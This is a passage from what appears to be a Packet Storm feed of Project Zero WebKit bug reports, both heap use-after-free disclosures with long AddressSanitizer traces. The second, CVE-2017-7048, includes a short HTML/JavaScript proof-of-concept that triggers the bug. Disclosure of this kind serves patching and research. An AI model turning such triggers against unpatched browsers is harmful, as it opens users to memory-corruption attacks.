(/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x241ed9c) \n#21 0x10a7cc522 in WebCore::RenderBlockFlow::layoutBlockChildren(bool, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x241b522) \n#22 0x10a7ca962 in WebCore::RenderBlockFlow::layoutBlock(bool, WebCore::LayoutUnit) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2419962) \n#23 0x10a7837d7 in WebCore::RenderBlock::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23d27d7) \n#24 0x10ab8536d in WebCore::RenderView::layoutContent(WebCore::LayoutState const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27d436d) \n#25 0x10ab85b74 in WebCore::RenderView::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27d4b74) \n#26 0x108f00943 in WebCore::FrameView::layout(bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb4f943) \n#27 0x108b1a1d0 in WebCore::Document::updateLayout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7691d0) \n#28 0x108b207b2 in WebCore::Document::updateLayoutIgnorePendingStylesheets(WebCore::Document::RunPostLayoutTasks) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x76f7b2) \n#29 0x108cd3b21 in WebCore::Element::innerText() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x922b21) \n \npreviously allocated by thread T0 here: \n#0 0x1031d3d2c in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x56d2c) \n#1 0x7fffe883a281 in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib:x86_64+0x2281) \n#2 0x116311ae4 in bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c54ae4) \n#3 0x116306c4d in bmalloc::Allocator::allocateSlowCase(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c49c4d) \n#4 0x11629c437 in bmalloc::Allocator::allocate(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1bdf437) \n#5 0x11629b768 in WTF::fastMalloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1bde768) \n#6 0x1085bb548 in WebCore::RenderObject::operator new(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x20a548) \n#7 0x10b157c4d in WebCore::RenderPtr<WebCore::RenderText> WebCore::createRenderer<WebCore::RenderText, WebCore::Text&, WTF::String const&>(WebCore::Text&&&, WTF::String const&&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2da6c4d) \n#8 0x10b157aae in WebCore::Text::createTextRenderer(WebCore::RenderStyle const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2da6aae) \n#9 0x10ab7d6a4 in WebCore::createTextRenderer(WebCore::Text&, WebCore::RenderTreePosition&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27cc6a4) \n#10 0x10ab7b057 in WebCore::RenderTreeUpdater::updateTextRenderer(WebCore::Text&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27ca057) \n#11 0x10ab7abfa in WebCore::RenderTreeUpdater::updateRenderTree(WebCore::ContainerNode&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c9bfa) \n#12 0x10ab7a47b in WebCore::RenderTreeUpdater::commit(std::__1::unique_ptr<WebCore::Style::Update const, std::__1::default_delete<WebCore::Style::Update const> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c947b) \n#13 0x108b1f7e9 in WebCore::Document::resolveStyle(WebCore::Document::ResolveStyleType) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x76e7e9) \n#14 0x108b20287 in WebCore::Document::implicitClose() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x76f287) \n#15 0x108ec59ce in WebCore::FrameLoader::checkCompleted() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb149ce) \n#16 0x108ec2d0c in WebCore::FrameLoader::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb11d0c) \n#17 0x108b3e493 in WebCore::Document::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x78d493) \n#18 0x1090b25c0 in WebCore::HTMLDocumentParser::prepareToStopParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd015c0) \n#19 0x108bdd093 in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x82c093) \n#20 0x108b9c386 in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7eb386) \n#21 0x10862b997 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27a997) \n#22 0x1086252aa in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2742aa) \n#23 0x10afacc41 in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2bfbc41) \n#24 0x105ec22eb in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa892eb) \n#25 0x105ec5689 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8c689) \n#26 0x105ec4ba9 in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8bba9) \n#27 0x105765683 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x32c683) \n#28 0x10550f3b5 in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xd63b5) \n#29 0x105518888 in IPC::Connection::dispatchOneMessage() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xdf888) \n \nSUMMARY: AddressSanitizer: heap-use-after-free (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x6aa25) in WebCore::RenderObject::RenderObjectBitfields::hasLayer() const \nShadow bytes around the buggy address: \n0x1c1000012100: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa \n0x1c1000012110: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa \n0x1c1000012120: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00 \n0x1c1000012130: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00 \n0x1c1000012140: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa \n=>0x1c1000012150: fa fa fa fa fd fd fd fd fd[fd]fd fd fd fd fd fd \n0x1c1000012160: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa \n0x1c1000012170: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa \n0x1c1000012180: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa \n0x1c1000012190: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00 \n0x1c10000121a0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd \nShadow byte legend (one shadow byte represents 8 application bytes): \nAddressable: 00 \nPartially addressable: 01 02 03 04 05 06 07 \nHeap left redzone: fa \nFreed heap region: fd \nStack left redzone: f1 \nStack mid redzone: f2 \nStack right redzone: f3 \nStack after return: f5 \nStack use after scope: f8 \nGlobal redzone: f9 \nGlobal init order: f6 \nPoisoned by user: f7 \nContainer overflow: fc \nArray cookie: ac \nIntra object redzone: bb \nASan internal: fe \nLeft alloca redzone: ca \nRight alloca redzone: cb \n==30692==ABORTING \n \n \nThis bug is subject to a 90 day disclosure deadline. After 90 days elapse \nor a patch has been made broadly available, the bug report will become \nvisible to the public. \n \n \n \n \nFound by: ifratric \n \n`\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/143488/GS20170725050805.txt"}, {"lastseen": "2017-07-26T22:47:05", "description": "", "published": "2017-07-25T00:00:00", "type": "packetstorm", "title": "WebKit WebCore::AccessibilityNodeObject::textUnderElement Use-After-Free", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7048"], "modified": "2017-07-25T00:00:00", "id": "PACKETSTORM:143489", "href": "https://packetstormsecurity.com/files/143489/WebKit-WebCore-AccessibilityNodeObject-textUnderElement-Use-After-Free.html", "sourceData": "` WebKit: use-after-free in WebCore::AccessibilityNodeObject::textUnderElement \n \nCVE-2017-7048 \n \n \nThere is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on ASan build of WebKit nightly. \n \nNote that accessibility features need to be enabled in order to trigger this bug. On Safari on Mac this can be accomplished by opening the inspector (simply opening the inspector enables accessibility features). On WebKitGTK+ (and possibly other WebKit releases) accessibility features are enabled by default. \n \nPoC: \n \n================================================================= \n \n<script> \nfunction go() { \nli.hidden = true; \ndir.setAttribute(\"aria-labeledby\", \"map\"); \n} \n</script> \n<body onload=go()> \n<dir id=\"dir\"> \n<li id=\"li\"> \n<map id=\"map\"> \n<area></area> \n \n================================================================= \n \nASan log: \n \n================================================================= \n==728==ERROR: AddressSanitizer: heap-use-after-free on address 0x6080000908a0 at pc 0x000109f2cbb5 bp 0x7fff5e08a430 sp 0x7fff5e08a428 \nREAD of size 8 at 0x6080000908a0 thread T0 \n==728==WARNING: invalid path to external symbolizer! \n==728==WARNING: Failed to use and restart external symbolizer! \n#0 0x109f2cbb4 in WebCore::AccessibilityNodeObject::textUnderElement(WebCore::AccessibilityTextUnderElementMode) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x25bb4) \n#1 0x109f58273 in WebCore::AccessibilityRenderObject::textUnderElement(WebCore::AccessibilityTextUnderElementMode) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x51273) \n#2 0x109f2a6e0 in WebCore::accessibleNameForNode(WebCore::Node*, WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x236e0) \n#3 0x109f2e8d3 in WebCore::AccessibilityNodeObject::accessibilityDescriptionForElements(WTF::Vector<WebCore::Element*, 0ul, WTF::CrashOnOverflow, 16ul>&) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x278d3) \n#4 0x109f2ec3e in WebCore::AccessibilityNodeObject::ariaLabeledByAttribute() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c3e) \n#5 0x109f279c9 in WebCore::AccessibilityNodeObject::ariaAccessibilityDescription() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x209c9) \n#6 0x109f2ed5c in WebCore::AccessibilityNodeObject::hasAttributesRequiredForInclusion() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27d5c) \n#7 0x109f5d550 in WebCore::AccessibilityRenderObject::computeAccessibilityIsIgnored() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x56550) \n#8 0x109f464ab in WebCore::AccessibilityObject::accessibilityIsIgnored() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3f4ab) \n#9 0x10a0e2df1 in WebCore::AXObjectCache::getOrCreate(WebCore::RenderObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1dbdf1) \n#10 0x10a0e0b6f in WebCore::AXObjectCache::getOrCreate(WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1d9b6f) \n#11 0x10a0e650d in WebCore::AXObjectCache::textChanged(WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1df50d) \n#12 0x10a820041 in WebCore::Element::attributeChanged(WebCore::QualifiedName const&, WTF::AtomicString const&, WTF::AtomicString const&, WebCore::Element::AttributeModificationReason) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x919041) \n#13 0x10a826268 in WebCore::Element::didAddAttribute(WebCore::QualifiedName const&, WTF::AtomicString const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x91f268) \n#14 0x10a82607c in WebCore::Element::addAttributeInternal(WebCore::QualifiedName const&, WTF::AtomicString const&, WebCore::Element::SynchronizationOfLazyAttribute) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x91f07c) \n#15 0x10a81f8d7 in WebCore::Element::setAttributeInternal(unsigned int, WebCore::QualifiedName const&, WTF::AtomicString const&, WebCore::Element::SynchronizationOfLazyAttribute) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9188d7) \n#16 0x10a81f6c1 in WebCore::Element::setAttribute(WTF::AtomicString const&, WTF::AtomicString const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9186c1) \n#17 0x10b463b93 in WebCore::jsElementPrototypeFunctionSetAttributeCaller(JSC::ExecState*, WebCore::JSElement*, JSC::ThrowScope&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x155cb93) \n#18 0x10b4555d8 in long long WebCore::BindingCaller<WebCore::JSElement>::callOperation<&(WebCore::jsElementPrototypeFunctionSetAttributeCaller(JSC::ExecState*, WebCore::JSElement*, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState*, char const*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x154e5d8) \n#19 0x10b455441 in WebCore::jsElementPrototypeFunctionSetAttribute(JSC::ExecState*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x154e441) \n#20 0x279e6e001027 (<unknown module>) \n#21 0x115e2934a in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x157734a) \n#22 0x115e2934a in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x157734a) \n#23 0x115e2291a in vmEntryToJavaScript (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x157091a) \n#24 0x115a87757 in JSC::JITCode::execute(JSC::VM*, JSC::ProtoCallFrame*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x11d5757) \n#25 0x115a093da in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x11573da) \n#26 0x1150410f1 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x78f0f1) \n#27 0x115041362 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x78f362) \n#28 0x1150416d3 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x78f6d3) \n#29 0x10b0faa15 in WebCore::JSMainThreadExecState::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x11f3a15) \n#30 0x10b48e510 in WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext*, WebCore::Event*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1587510) \n#31 0x10a88f68e in WebCore::EventTarget::fireEventListeners(WebCore::Event&, WTF::Vector<WTF::RefPtr<WebCore::RegisteredEventListener>, 1ul, WTF::CrashOnOverflow, 16ul>) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x98868e) \n#32 0x10a88f170 in WebCore::EventTarget::fireEventListeners(WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x988170) \n#33 0x10a76a041 in WebCore::DOMWindow::dispatchEvent(WebCore::Event&, WebCore::EventTarget*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x863041) \n#34 0x10a779aaf in WebCore::DOMWindow::dispatchLoadEvent() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x872aaf) \n#35 0x10a67b7af in WebCore::Document::dispatchWindowLoadEvent() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7747af) \n#36 0x10a676103 in WebCore::Document::implicitClose() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x76f103) \n#37 0x10aa1b9ce in WebCore::FrameLoader::checkCompleted() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb149ce) \n#38 0x10aa18d0c in WebCore::FrameLoader::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb11d0c) \n#39 0x10a694493 in WebCore::Document::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x78d493) \n#40 0x10ac085c0 in WebCore::HTMLDocumentParser::prepareToStopParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd015c0) \n#41 0x10a733093 in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x82c093) \n#42 0x10a6f2386 in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7eb386) \n#43 0x10a181997 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27a997) \n#44 0x10a17b2aa in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2742aa) \n#45 0x10cb02c41 in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2bfbc41) \n#46 0x10260c2eb in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa892eb) \n#47 0x10260f689 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8c689) \n#48 0x10260eba9 in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8bba9) \n#49 0x101eaf683 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x32c683) \n#50 0x101c593b5 in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xd63b5) \n#51 0x101c62888 in IPC::Connection::dispatchOneMessage() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xdf888) \n#52 0x1164b5312 in WTF::RunLoop::performWork() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c03312) \n#53 0x1164b5d41 in WTF::RunLoop::performWork(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c03d41) \n#54 0x7fff8da4f3c0 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0xa73c0) \n#55 0x7fff8da302cc in __CFRunLoopDoSources0 (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x882cc) \n#56 0x7fff8da2f7c5 in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x877c5) \n#57 0x7fff8da2f1c3 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x871c3) \n#58 0x7fff8cf90ebb in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30ebb) \n#59 0x7fff8cf90cf0 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30cf0) \n#60 0x7fff8cf90b25 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30b25) \n#61 0x7fff8b52be23 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x46e23) \n#62 0x7fff8bca785d in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7c285d) \n#63 0x7fff8b5207aa in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x3b7aa) \n#64 0x7fff8b4eb1dd in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x61dd) \n#65 0x7fffa33eb8c6 in _xpc_objc_main (/usr/lib/system/libxpc.dylib:x86_64+0x108c6) \n#66 0x7fffa33ea2e3 in xpc_main (/usr/lib/system/libxpc.dylib:x86_64+0xf2e3) \n#67 0x101b7156c in main (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development:x86_64+0x10000156c) \n#68 0x7fffa3192234 in start (/usr/lib/system/libdyld.dylib:x86_64+0x5234) \n \n0x6080000908a0 is located 0 bytes inside of 88-byte region [0x6080000908a0,0x6080000908f8) \nfreed by thread T0 here: \n#0 0x104b54294 in __sanitizer_mz_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x57294) \n#1 0x1164fcf30 in bmalloc::Deallocator::deallocateSlowCase(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c4af30) \n#2 0x10a0e1fda in WebCore::AXObjectCache::remove(unsigned int) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1dafda) \n#3 0x10a0e576e in WebCore::AXObjectCache::remove(WebCore::RenderObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1de76e) \n#4 0x10c573c0b in WebCore::RenderObject::willBeDestroyed() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x266cc0b) \n#5 0x10c681ac3 in WebCore::RenderText::willBeDestroyed() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x277aac3) \n#6 0x10c57412f in WebCore::RenderObject::destroy() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x266d12f) \n#7 0x10c6d35ba in WebCore::RenderTreeUpdater::tearDownRenderer(WebCore::Text&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27cc5ba) \n#8 0x10c6d22a8 in WebCore::RenderTreeUpdater::tearDownRenderers(WebCore::Element&, WebCore::RenderTreeUpdater::TeardownType) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27cb2a8) \n#9 0x10c6d11de in WebCore::RenderTreeUpdater::updateElementRenderer(WebCore::Element&, WebCore::Style::ElementUpdate const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27ca1de) \n#10 0x10c6d0c4d in WebCore::RenderTreeUpdater::updateRenderTree(WebCore::ContainerNode&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c9c4d) \n#11 0x10c6d047b in 